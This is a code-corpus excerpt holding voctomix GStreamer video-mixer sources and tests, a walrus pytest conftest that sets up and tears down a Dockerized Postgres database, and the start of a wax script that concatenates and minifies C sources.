text=\"{nosignal}\"
valignment=center
halignment=center
shaded-background=yes
font-desc="Roboto Bold, 20"
! {vcaps}
! queue
max-size-time=3000000000
! compositor-{name}.
{videoport}
! {vcaps}
! queue
max-size-time=3000000000
! compositor-{name}.
compositor
name=compositor-{name}
! queue
max-size-time=3000000000
! tee
name=video-{name}"""
else:
video = """
{videoport}
! {vcaps}
! queue
max-size-time=3000000000
! tee
name=video-{name}"""
self.bin += video.format(
videoport=self.build_videoport(),
name=self.name,
vcaps=Config.getVideoCaps(),
nosignal=self.get_nosignal_text(),
nosignalpattern=Config.getNoSignal()
)
self.bin += "" if Args.no_bins else """
)
"""
self.bin = self.bin
def build_source(self):
return ""
def build_deinterlacer(self):
source_mode = Config.getSourceScan(self.name)
if source_mode == "interlaced":
return "videoconvert ! yadif mode=interlaced"
elif source_mode == "psf":
return "capssetter " \
"caps=video/x-raw,interlace-mode=progressive"
elif source_mode == "progressive":
return None
else:
raise RuntimeError(
"Unknown Deinterlace-Mode on source {} configured: {}".
format(self.name, source_mode))
def video_channels(self):
return 1 if self.has_video else 0
def audio_channels(self):
return self.audio_streams.num_channels(self.name) if self.has_audio else 0
def internal_audio_channels(self):
return self.audio_streams.num_channels(self.name, self.get_valid_channel_numbers()) if self.has_audio else 0
def get_valid_channel_numbers(self):
return [x for x in range(1, 255)]
def num_connections(self):
return 0
def is_input(self):
return True
def section(self):
return 'source.{}'.format(self.name)
@abstractmethod
def port(self):
raise NotImplementedError("port() not implemented in %s" % self.name)
def build_audioport(self):
return None
def build_videoport(self):
return None
def get_nosignal_text(self):
return "NO SIGNAL\n" + self.name.upper()
def do_timeout(self):
if self.noSignalSink:
self.noSignalSink.set_property(
'alpha', 1.0 if self.num_connections() > 0 else 0.0)
# just come back
return True
```
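AVSource above is an abstract base class: a concrete source implements __str__ and port(), supplies the GStreamer source and port descriptions, and then calls build_pipeline(). The following is a minimal, non-functional sketch of that subclass shape; the class and element names are illustrative, and it still needs voctocore's Config to be loaded before it can actually build a pipeline.
```python
from lib.sources.avsource import AVSource


class TestPatternSource(AVSource):
    def __init__(self, name):
        # video-only source; no audio streams are declared for it
        super().__init__('TestPatternSource', name,
                         has_audio=False, has_video=True)
        self.build_pipeline()

    def __str__(self):
        return 'TestPatternSource[{}]'.format(self.name)

    def port(self):
        return 'videotestsrc'

    def build_source(self):
        # a test pattern stands in for a real capture element
        return """
    videotestsrc
        name=testsrc-{name}
""".format(name=self.name)

    def build_videoport(self):
        return 'testsrc-{}.'.format(self.name)
```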
#### File: lib/sources/decklinkavsource.py
```python
import logging
import re
from lib.config import Config
from lib.sources.avsource import AVSource
class DeckLinkAVSource(AVSource):
timer_resolution = 0.5
def __init__(self, name, has_audio=True, has_video=True):
super().__init__('DecklinkAVSource', name, has_audio, has_video, show_no_signal=True)
self.device = Config.getDeckLinkDeviceNumber(name)
self.aconn = Config.getDeckLinkAudioConnection(name)
self.vconn = Config.getDeckLinkVideoConnection(name)
self.vmode = Config.getDeckLinkVideoMode(name)
self.vfmt = Config.getDeckLinkVideoFormat(name)
self.name = name
self.signalPad = None
self.build_pipeline()
def port(self):
return "Decklink #{}".format(self.device)
def attach(self, pipeline):
super().attach(pipeline)
self.signalPad = pipeline.get_by_name(
'decklinkvideosrc-{}'.format(self.name))
def num_connections(self):
return 1 if self.signalPad and self.signalPad.get_property('signal') else 0
def get_valid_channel_numbers(self):
return (2, 8, 16)
def __str__(self):
return 'DecklinkAVSource[{name}] reading card #{device}'.format(
name=self.name,
device=self.device
)
def build_source(self):
# A video source is required even when we only need audio
pipe = """
decklinkvideosrc
name=decklinkvideosrc-{name}
device-number={device}
connection={conn}
video-format={fmt}
mode={mode}
""".format(name=self.name,
device=self.device,
conn=self.vconn,
mode=self.vmode,
fmt=self.vfmt
)
# add rest of the video pipeline
if self.has_video:
# maybe add deinterlacer
if self.build_deinterlacer():
pipe += """\
! {deinterlacer}
""".format(deinterlacer=self.build_deinterlacer())
pipe += """\
! videoconvert
! videoscale
! videorate
name=vout-{name}
""".format(
deinterlacer=self.build_deinterlacer(),
name=self.name
)
else:
pipe += """\
! fakesink
"""
if self.internal_audio_channels():
pipe += """
decklinkaudiosrc
name=decklinkaudiosrc-{name}
device-number={device}
connection={conn}
channels={channels}
""".format(name=self.name,
device=self.device,
conn=self.aconn,
channels=self.internal_audio_channels())
return pipe
def build_audioport(self):
return 'decklinkaudiosrc-{name}.'.format(name=self.name)
def build_videoport(self):
return 'vout-{}.'.format(self.name)
def get_nosignal_text(self):
return super().get_nosignal_text() + "/BM%d" % self.device
```
#### File: voctocore/lib/tcpmulticonnection.py
```python
import logging
import socket
import sys
from queue import Queue
from abc import ABCMeta, abstractmethod
from gi.repository import GObject
class TCPMultiConnection(object, metaclass=ABCMeta):
def __init__(self, port):
if not hasattr(self, 'log'):
self.log = logging.getLogger('TCPMultiConnection')
self._port = None
try:
self.boundSocket = None
self.currentConnections = dict()
self.log.debug('Binding to Source-Socket on [::]:%u', port)
self.boundSocket = socket.socket(socket.AF_INET6)
self.boundSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.boundSocket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY,
False)
self.boundSocket.bind(('::', port))
self.boundSocket.listen(1)
self._port = port
self.log.debug('Setting GObject io-watch on Socket')
GObject.io_add_watch(self.boundSocket, GObject.IO_IN, self.on_connect)
except OSError:
self.log.error("Can not open listening port %d because it is already in use. Is another instance of voctocore running already?" % port)
sys.exit(-1)
def port(self):
return "%s:%d" % (socket.gethostname(), self._port if self._port else 0)
def num_connections(self):
return len(self.currentConnections)
def is_input(self):
return False
def on_connect(self, sock, *args):
conn, addr = sock.accept()
conn.setblocking(False)
self.log.info("Incoming Connection from [%s]:%u (fd=%u)",
addr[0], addr[1], conn.fileno())
self.currentConnections[conn] = Queue()
self.log.info('Now %u Receiver(s) connected',
len(self.currentConnections))
self.on_accepted(conn, addr)
return True
def close_connection(self, conn):
if conn in self.currentConnections:
conn.close()
del(self.currentConnections[conn])
self.log.info('Now %u Receiver connected',
len(self.currentConnections))
@abstractmethod
def on_accepted(self, conn, addr):
raise NotImplementedError(
"child classes of TCPMultiConnection must implement on_accepted()"
)
```
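A minimal sketch of how this base class is meant to be used: a subclass only has to provide `on_accepted()`. The class name, import path and logging below are illustrative assumptions, not part of voctocore.
```python
import logging

from lib.tcpmulticonnection import TCPMultiConnection  # module path assumed from the file layout above


class ExampleSink(TCPMultiConnection):
    """Illustrative subclass; voctocore's real sinks also wire the socket into GStreamer."""

    def __init__(self, port):
        self.log = logging.getLogger('ExampleSink')
        super().__init__(port)

    def on_accepted(self, conn, addr):
        # A real implementation would start serving the per-connection Queue
        # created in on_connect(); here the new receiver is only logged.
        self.log.info('accepted connection from [%s]:%u', addr[0], addr[1])
```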
#### File: tests/commands/test_get_audio.py
```python
import json
from mock import ANY
from lib.response import OkResponse
from tests.commands.commands_test_base import CommandsTestBase
class GetAudioTest(CommandsTestBase):
def test_get_audio(self):
self.pipeline_mock.amix.getAudioVolumes.return_value = [1.0, 0.0, 0.25]
response = self.commands.get_audio()
self.assertIsInstance(response, OkResponse)
self.assertEqual(response.args, ('audio_status', ANY))
self.assertEqual(json.loads(response.args[1]), {
"cam1": 1.0,
"cam2": 0.0,
"grabber": 0.25
})
```
#### File: tests/commands/test_get_config_option.py
```python
import configparser
from lib.config import Config
from lib.response import OkResponse
from tests.commands.commands_test_base import CommandsTestBase
class GetConfigOptionTest(CommandsTestBase):
def test_get_config_option(self):
Config.given('somesection', 'somekey', 'somevalue')
response = self.commands.get_config_option('somesection', 'somekey')
self.assertIsInstance(response, OkResponse)
self.assertEqual(response.args, ('server_config_option', 'somesection', 'somekey', 'somevalue'))
def test_get_option_from_unknown_config_section_fails(self):
with self.assertRaises(configparser.NoSectionError):
self.commands.get_config_option('othersection', 'otherkey')
def test_get_unknown_config_option_fails(self):
Config.given('somesection', 'somekey', 'somevalue')
with self.assertRaises(configparser.NoOptionError):
self.commands.get_config_option('somesection', 'otherkey')
```
#### File: tests/commands/test_set_audio.py
```python
from mock import ANY
from lib.response import NotifyResponse
from tests.commands.commands_test_base import CommandsTestBase
class SetAudioTest(CommandsTestBase):
def test_set_audio(self):
response = self.commands.set_audio("grabber")
self.pipeline_mock.amix.setAudioSource.assert_called_with(2)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('audio_status', ANY))
def test_cant_set_audio_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_audio("moofoo")
self.pipeline_mock.amix.setAudioSource.assert_not_called()
def test_cant_set_audio_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_audio(1)
self.pipeline_mock.amix.setAudioSource.assert_not_called()
```
#### File: tests/commands/test_set_video.py
```python
from mock import ANY
from lib.response import NotifyResponse
from tests.commands.commands_test_base import CommandsTestBase
class SetVideoTest(CommandsTestBase):
def test_set_video_a(self):
response = self.commands.set_video_a("cam2")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('video_status', ANY, ANY))
def test_cant_set_video_a_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_video_a("foobar")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
def test_cant_set_video_a_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_video_a(1)
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
def test_set_video_b(self):
response = self.commands.set_video_b("grabber")
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('video_status', ANY, ANY))
def test_cant_set_video_b_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_video_b("moobar")
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_cant_set_video_b_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_video_b(2)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
```
#### File: tests/commands/test_set_videos_and_composite.py
```python
from mock import ANY
from tests.commands.commands_test_base import CommandsTestBase
from lib.videomix import CompositeModes
class CommandsSetVideosAndComposite(CommandsTestBase):
def test_returns_expected_notifications(self):
self.pipeline_mock.vmix.getCompositeMode.return_value = \
CompositeModes.fullscreen
self.pipeline_mock.vmix.getVideoSourceA.return_value = 0
self.pipeline_mock.vmix.getVideoSourceB.return_value = 1
notifications = self.commands.set_videos_and_composite(
"cam1", "*", "*")
self.assertContainsNotification(
notifications, 'composite_mode', 'fullscreen')
self.assertContainsNotification(
notifications, 'video_status', 'cam1', 'cam2')
def test_can_set_video_a(self):
self.commands.set_videos_and_composite("cam1", "*", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(0)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_a_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("foobar", "*", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_b(self):
self.commands.set_videos_and_composite("*", "cam2", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(1)
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_b_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("*", "foobar", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_a_and_b(self):
self.commands.set_videos_and_composite("cam2", "grabber", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_a_and_b_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("foobar", "foobar", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_a_and_composite_mode(self):
self.commands.set_videos_and_composite("cam2", "*", "fullscreen")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=ANY)
def test_can_set_video_b_and_composite_mode(self):
self.commands.set_videos_and_composite(
"*", "grabber", "side_by_side_equal")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_equal, apply_default_source=ANY)
def test_can_set_video_a_and_b_and_composite_mode(self):
self.commands.set_videos_and_composite(
"cam1", "grabber", "side_by_side_equal")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(0)
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_equal, apply_default_source=ANY)
def test_can_set_composite_mode(self):
self.commands.set_videos_and_composite(
"*", "*", "side_by_side_preview")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_preview, apply_default_source=ANY)
def test_setting_composite_mode_without_sources_applies_default_source(self):
self.commands.set_videos_and_composite(
"*", "*", "side_by_side_preview")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_preview, apply_default_source=True)
def test_setting_composite_mode_with_a_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("grabber", "*", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
def test_setting_composite_mode_with_b_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("*", "grabber", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
def test_setting_composite_mode_with_a_and_b_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("cam1", "grabber", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
```
#### File: tests/videomix/test_videomixer_set_sources.py
```python
from tests.helper.voctomix_test import VoctomixTest
from lib.videomix import VideoMix
class VideomixerSetSources(VoctomixTest):
def setUp(self):
super().setUp()
self.videomixer = VideoMix()
def test_can_set_source_a(self):
self.videomixer.setVideoSourceA(42)
self.assertEqual(self.videomixer.sourceA, 42)
def test_can_set_source_b(self):
self.videomixer.setVideoSourceB(23)
self.assertEqual(self.videomixer.sourceB, 23)
def test_setting_source_a_swaps_a_and_b_if_required(self):
self.videomixer.sourceA = 42
self.videomixer.sourceB = 23
self.videomixer.setVideoSourceA(23)
self.assertEqual(self.videomixer.sourceA, 23)
self.assertEqual(self.videomixer.sourceB, 42)
def test_setting_source_b_swaps_a_and_b_if_required(self):
self.videomixer.sourceA = 13
self.videomixer.sourceB = 78
self.videomixer.setVideoSourceB(13)
self.assertEqual(self.videomixer.sourceA, 78)
self.assertEqual(self.videomixer.sourceB, 13)
```
#### File: voctogui/lib/args.py
```python
import argparse
__all__ = ['Args']
Args = None
def parse():
global Args
parser = argparse.ArgumentParser(description='Voctogui')
parser.add_argument('-v', '--verbose', action='count', default=0,
help="Set verbosity level by using -v, -vv or -vvv.")
parser.add_argument('-c', '--color',
action='store',
choices=['auto', 'always', 'never'],
default='auto',
help="Control the use of colors in the Log-Output")
parser.add_argument('-t', '--timestamp', action='store_true',
help="Enable timestamps in the Log-Output")
parser.add_argument('-i', '--ini-file', action='store',
help="Load a custom configuration file")
parser.add_argument('-H', '--host', action='store',
help="Connect to this host "
"instead of the configured one.")
parser.add_argument('-d', '--dot', action='store_true',
help="Generate DOT files of pipelines into directory given in environment variable GST_DEBUG_DUMP_DOT_DIR")
parser.add_argument('-D', '--gst-debug-details', action='store', default=15,
help="Set details in dot graph. GST_DEBUG_DETAILS must be a combination the following values: 1 = show caps-name on edges, 2 = show caps-details on edges, 4 = show modified parameters on elements, 8 = show element states, 16 = show full element parameter values even if they are very long. Default: 15 = show all the typical details that one might want (15=1+2+4+8)")
parser.add_argument('-g', '--gstreamer-log', action='count', default=0,
help="Log gstreamer messages into voctocore log (Set log level by using -g, -gg or -ggg).")
Args = parser.parse_args()
```
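A small usage sketch (voctogui's actual start-up script is not part of this excerpt): `parse()` fills in the module-level `Args` object, which other modules then read directly.
```python
from lib import args

args.parse()                      # populates the module-level Args namespace
print(args.Args.verbose)          # 0, 1, 2 or 3 depending on how many -v flags were given
if args.Args.dot:
    print("pipeline DOT files will be written to $GST_DEBUG_DUMP_DOT_DIR")
```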
#### File: voctogui/lib/ports.py
```python
import logging
import os
import json
from gi.repository import Gtk, Gst, GLib
from lib.config import Config
from lib.uibuilder import UiBuilder
import lib.connection as Connection
from vocto.port import Port
# time interval to re-fetch queue timings
TIMER_RESOLUTION = 5.0
COLOR_OK = ("white", "darkgreen")
COLOR_WARN = ("darkred", "darkorange")
COLOR_ERROR = ("white", "red")
class PortsWindowController():
def __init__(self, uibuilder):
        self.log = logging.getLogger('PortsWindowController')
# get related widgets
self.win = uibuilder.get_check_widget('ports_win')
self.store = uibuilder.get_check_widget('ports_store')
self.scroll = uibuilder.get_check_widget('ports_scroll')
self.title = uibuilder.get_check_widget('ports_title')
self.title.set_title("VOC2CORE {}".format(Config.getHost()))
# remember row iterators
self.iterators = None
        # listen for port_report from voctocore
Connection.on('port_report', self.on_port_report)
def on_port_report(self, *report):
def color(port):
if port.connections > 0:
return COLOR_OK
else:
return COLOR_ERROR if port.is_input() else COLOR_WARN
        # read the string report into a dictionary
report = json.loads("".join(report))
# check if this is the initial report
if not self.iterators:
# append report as rows to treeview store and remember row iterators
self.iterators = dict()
for p in report:
port = Port.from_str(p)
self.iterators[port.port] = self.store.append((
port.name,
port.audio,
port.video,
"IN" if port.is_input() else "OUT",
port.port,
*color(port)
))
else:
# just update values of second column
for p in report:
port = Port.from_str(p)
it = self.iterators[port.port]
self.store.set_value(it, 0, port.name)
self.store.set_value(it, 1, port.audio)
self.store.set_value(it, 2, port.video)
self.store.set_value(it, 3, "IN" if port.is_input() else "OUT")
self.store.set_value(it, 4, port.port)
self.store.set_value(it, 5, color(port)[0])
self.store.set_value(it, 6, color(port)[1])
def show(self, visible=True):
# check if widget is getting visible
if visible:
            # request a port report from voctocore
Connection.send('report_ports')
# schedule repetition
GLib.timeout_add(TIMER_RESOLUTION * 1000, self.do_timeout)
# do the boring stuff
self.win.show()
else:
self.win.hide()
def do_timeout(self):
        # re-request the port report
Connection.send('report_ports')
# repeat if widget is visible
return self.win.is_visible()
```
#### File: voctogui/lib/videodisplay.py
```python
import logging
import sys
from gi.repository import Gst, Gdk
from lib.args import Args
from lib.config import Config
from lib.clock import Clock
from vocto.port import Port
from vocto.debug import gst_generate_dot
from vocto.pretty import pretty
class VideoDisplay(object):
"""Displays a Voctomix-Video-Stream into a GtkWidget"""
def __init__(self, video_drawing_area, audio_display, port, name, width=None, height=None,
play_audio=False):
self.log = logging.getLogger('VideoDisplay:%s' % name)
self.name = name
self.video_drawing_area = video_drawing_area
self.level_callback = audio_display.callback
video_decoder = None
# Setup Server-Connection, Demuxing and Decoding
pipe = """
tcpclientsrc
name=tcpsrc-{name}
host={host}
port={port}
blocksize=1048576
! matroskademux
name=demux-{name}
""".format(name=name,
host=Config.getHost(),
port=port)
if Config.getPreviewsEnabled():
self.log.info('using encoded previews instead of raw-video')
if Config.getPreviewVaapi():
if Gst.version() < (1, 8):
vaapi_decoders = {
'h264': 'vaapidecode_h264',
'mpeg2': 'vaapidecode_mpeg2',
}
else:
vaapi_decoders = {
'h264': 'vaapih264dec',
'mpeg2': 'vaapimpeg2dec',
}
video_decoder = vaapi_decoders[Config.getPreviewDecoder()]
else:
cpu_decoders = {
'h264': 'video/x-h264\n! avdec_h264',
'jpeg': 'image/jpeg\n! jpegdec',
'mpeg2': 'video/mpeg\nmpegversion=2\n! mpeg2dec'
}
video_decoder = cpu_decoders[Config.getPreviewDecoder()]
pipe += """
demux-{name}.
! queue
name=queue-video-{name}
! {video_decoder}
""".format(name=name,
video_decoder=video_decoder)
else:
video_decoder = None
preview_caps = 'video/x-raw'
self.log.info('using raw-video instead of encoded-previews')
pipe += """
demux-{name}.
! queue
name=queue-video-{name}
! {previewcaps}
""".format(name=name,
previewcaps=preview_caps,
vcaps=Config.getVideoCaps())
pipe += """ ! videoconvert
! videoscale
"""
if Config.getPreviewNameOverlay() and name:
pipe += """\
! textoverlay
name=title-{name}
text=\"{name}\"
valignment=bottom
halignment=center
shaded-background=yes
font-desc="Roboto, 22"
""".format(name=name)
# Video Display
videosystem = Config.getVideoSystem()
self.log.debug('Configuring for Video-System %s', videosystem)
if videosystem == 'gl':
pipe += """ ! glupload
! glcolorconvert
! glimagesinkelement
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'xv':
pipe += """ ! xvimagesink
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'x':
pipe += """ ! ximagesink
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'vaapi':
pipe += """ ! vaapisink
name=imagesink-{name}
""".format(name=name)
else:
raise Exception(
'Invalid Videodisplay-System configured: %s' % videosystem
)
# add an Audio-Path through a level-Element
pipe += """
demux-{name}.
! queue
name=queue-audio-{name}
! level
name=lvl
interval=50000000
! audioconvert
"""
        # If playback is requested, push to pulseaudio
if play_audio:
pipe += """ ! pulsesink
name=audiosink-{name}
"""
else:
pipe += """ ! fakesink
"""
pipe = pipe.format(name=name,
acaps=Config.getAudioCaps(),
port=port,
)
self.log.info("Creating Display-Pipeline:\n%s", pretty(pipe))
try:
# launch gstreamer pipeline
self.pipeline = Gst.parse_launch(pipe)
self.log.info("pipeline launched successfuly")
except:
self.log.error("Can not launch pipeline")
sys.exit(-1)
if Args.dot:
self.log.debug("Generating DOT image of videodisplay pipeline")
gst_generate_dot(self.pipeline, "gui.videodisplay.{}".format(name))
self.pipeline.use_clock(Clock)
self.video_drawing_area.add_events(
Gdk.EventMask.KEY_PRESS_MASK | Gdk.EventMask.KEY_RELEASE_MASK)
self.video_drawing_area.connect("realize", self.on_realize)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.enable_sync_message_emission()
bus.connect('message::error', self.on_error)
bus.connect('sync-message::element', self.on_syncmsg)
bus.connect('message::state-changed', self.on_state_changed)
bus.connect("message::element", self.on_level)
def on_realize(self, win):
self.imagesink = self.pipeline.get_by_name(
'imagesink-{name}'.format(name=self.name))
self.xid = self.video_drawing_area.get_property('window').get_xid()
self.log.debug('Realized Drawing-Area with xid %u', self.xid)
self.video_drawing_area.realize()
self.log.info("Launching Display-Pipeline")
self.pipeline.set_state(Gst.State.PLAYING)
def on_syncmsg(self, bus, msg):
if type(msg) == Gst.Message and self.imagesink:
if msg.get_structure().get_name() == "prepare-window-handle":
self.log.info(
'Setting imagesink window-handle to 0x%x', self.xid)
self.imagesink.set_window_handle(self.xid)
def on_error(self, bus, message):
(error, debug) = message.parse_error()
self.log.error(
"GStreamer pipeline element '%s' signaled an error #%u: %s" % (message.src.name, error.code, error.message))
def mute(self, mute):
self.pipeline.get_by_name("audiosink-{name}".format(name=self.name)).set_property(
"volume", 1 if mute else 0)
def on_level(self, bus, msg):
if self.level_callback and msg.src.name == 'lvl':
rms = msg.get_structure().get_value('rms')
peak = msg.get_structure().get_value('peak')
decay = msg.get_structure().get_value('decay')
self.level_callback(rms, peak, decay)
def on_state_changed(self, bus, message):
if message.parse_state_changed().newstate == Gst.State.PLAYING:
self.video_drawing_area.show()
```
#### File: voctogui/lib/videopreviews.py
```python
import logging
import json
import math
import os
from configparser import NoOptionError
from gi.repository import Gtk, Gdk, GObject
from lib.videodisplay import VideoDisplay
from lib.audiodisplay import AudioDisplay
import lib.connection as Connection
from lib.config import Config
from vocto.port import Port
class VideoPreviewsController(object):
"""Displays Video-Previews and selection Buttons for them"""
def __init__(self, video_box, audio_box, win, uibuilder):
self.log = logging.getLogger('VideoPreviewsController')
self.win = win
self.preview_players = {}
self.previews = {}
self.volume_sliders = {}
self.video_box = video_box
self.audio_box = audio_box
# Accelerators
accelerators = Gtk.AccelGroup()
win.add_accel_group(accelerators)
# count number of previews
num_previews = len(Config.getSources()) + len(Config.getLivePreviews())
# get preview size
self.previewSize = Config.getPreviewSize()
# recalculate preview size if in sum they are too large for screen
screen = Gdk.Screen.get_default()
if screen.get_height() < self.previewSize[1] * num_previews:
height = screen.get_height() / num_previews
self.previewSize = (Config.getVideoRatio() * height, height)
self.log.warning(
'Resizing previews so that they fit onto screen to WxH={}x{}'.format(*self.previewSize))
# connect event-handler and request initial state
Connection.send('get_video')
def addPreview(self, uibuilder, source, port, has_volume=True):
self.log.info('Initializing video preview %s at port %d', source, port)
video = uibuilder.load_check_widget('video',
os.path.dirname(uibuilder.uifile) +
"/widgetpreview.ui")
video.set_size_request(*self.previewSize)
self.video_box.pack_start(video, fill=False,
expand=False, padding=0)
mix_audio_display = AudioDisplay(self.audio_box, source, uibuilder, has_volume)
player = VideoDisplay(video, mix_audio_display, port=port,
width=self.previewSize[0],
height=self.previewSize[1],
name=source.upper()
)
``` |
{
"source": "0xflotus/walrus",
"score": 2
} |
#### File: walrus/test/conftest.py
```python
import json
import os
import subprocess
import time
from typing import Any
import pytest
from sqlalchemy import create_engine, text
from sqlalchemy.orm import Session
CONTAINER_NAME = "walrus_db"
@pytest.fixture(scope="session")
def dockerize_database():
# Skip if we're using github actions CI
if not "GITHUB_SHA" in os.environ:
subprocess.call(["docker-compose", "up", "-d"])
# Wait for postgres to become healthy
for _ in range(10):
print(1)
out = subprocess.check_output(["docker", "inspect", CONTAINER_NAME])
container_info = json.loads(out)
container_health_status = container_info[0]["State"]["Health"]["Status"]
if container_health_status == "healthy":
time.sleep(1)
break
else:
time.sleep(1)
else:
raise Exception("Container never became healthy")
yield
subprocess.call(["docker-compose", "down", "-v"])
return
yield
@pytest.fixture(scope="session")
def engine(dockerize_database):
eng = create_engine(f"postgresql://postgres:postgres@localhost:5432/postgres")
yield eng
eng.dispose()
@pytest.fixture(scope="function")
def sess(engine):
conn = engine.connect()
conn.execute(
text(
"""
set search_path = '';
create table public.note(
id bigserial primary key,
user_id uuid not null,
body text not null,
arr_text text[] not null default array['one', 'two'],
arr_int int[] not null default array[1, 2],
-- dummy column with revoked select for "authenticated"
dummy text
);
create index ix_note_user_id on public.note (user_id);
create table public.unauthorized(
id bigserial primary key
);
drop publication if exists supabase_realtime;
create publication
supabase_realtime
for table
public.note,
public.unauthorized
with (
publish = 'insert,update,delete,truncate'
);
"""
)
)
conn.execute(text("commit"))
conn.execute(
text(
"""
select * from pg_create_logical_replication_slot('realtime', 'wal2json', false);
"""
)
)
conn.execute(text("commit"))
# Bind a session to the top level transaction
_session = Session(bind=conn)
yield _session
# Close the session object
_session.rollback()
_session.close()
# Cleanup between tests
conn.execute(
"""
select pg_drop_replication_slot('realtime');
"""
)
conn.execute(
"""
drop schema public cascade;
create schema public;
drop publication supabase_realtime;
"""
)
conn.execute(
"""
grant usage on schema public to authenticated;
alter default privileges in schema public grant all on tables to authenticated;
alter default privileges in schema public grant all on functions to authenticated;
alter default privileges in schema public grant all on sequences to authenticated;
truncate table cdc.subscription cascade;
"""
)
conn.execute(text("commit"))
conn.close()
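# Illustrative only (not part of this conftest): test modules request the
# "sess" fixture by name and talk to the dockerized Postgres through it, e.g.
#
#     def test_insert_note(sess):
#         sess.execute(text(
#             "insert into public.note (user_id, body) "
#             "values ('00000000-0000-0000-0000-000000000000', 'hello')"
#         ))
#         sess.commit()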
def pytest_addoption(parser: Any) -> None:
parser.addoption(
"--run-perf",
action="store_true",
default=False,
help="run performance check",
)
def pytest_collection_modifyitems(config: Any, items: Any) -> None:
if not config.getoption("--run-perf"):
skip = pytest.mark.skip(reason="performance test. Use --run-perf to run")
for item in items:
if "performance" in item.keywords:
item.add_marker(skip)
return
``` |
{
"source": "0xflotus/wax",
"score": 3
} |
#### File: wax/tools/concat.py
```python
import re
from glob import glob
def min_c(src):
lines = src.split("\n")
out = ""
i = 0
cont = False
while i < len(lines):
l = lines[i].split("//")[0];
l = re.sub(r'\/\*.*?\*\/','',l);
if (not len(l.strip())):
i+=1
continue
if l.strip()[-1] == '\\':
cont = True
l = l.strip()[0:-1]
if (l.strip()[0] == '#'):
out += "\n"
out += l.strip()
if not cont:
out += "\n"
elif cont:
out += " "
out += l.strip()
else:
if not len(l[0].strip()) or l.strip()[0] == '}':
out += l.strip()
else:
out += "\n"
out += l.strip()
if lines[i].split("//")[0].strip()[-1] != '\\':
cont = False
i+=1
out = out.replace("\n\n","\n").replace("\n\n","\n").strip()
return out
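# Illustrative behaviour of min_c (example invented, not taken from the repo's
# tests): comments and blank lines are stripped and lines are re-joined, so
#     min_c("int x; // counter\n\nint y;")  ->  "int x;\nint y;"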
def min_wax(src):
return src.replace("\n"," ").strip()
def min_java(src):
return min_c(src)
def min_ts(src):
return src.replace("\n\n","\n");
def to_cstr(src):
return '"'+src.replace('"','\\"').replace("\n",'\\n"\n"')+'\\n"'
paths = glob("../src/std/std.*")+glob("../src/std/*.wax")
out = "/*GENERATED BY TOOLS/CONCAT.PY (DO NOT EDIT)*/\n#ifndef WAX_STD_TEXT\n#define WAX_STD_TEXT\n"
for p in paths:
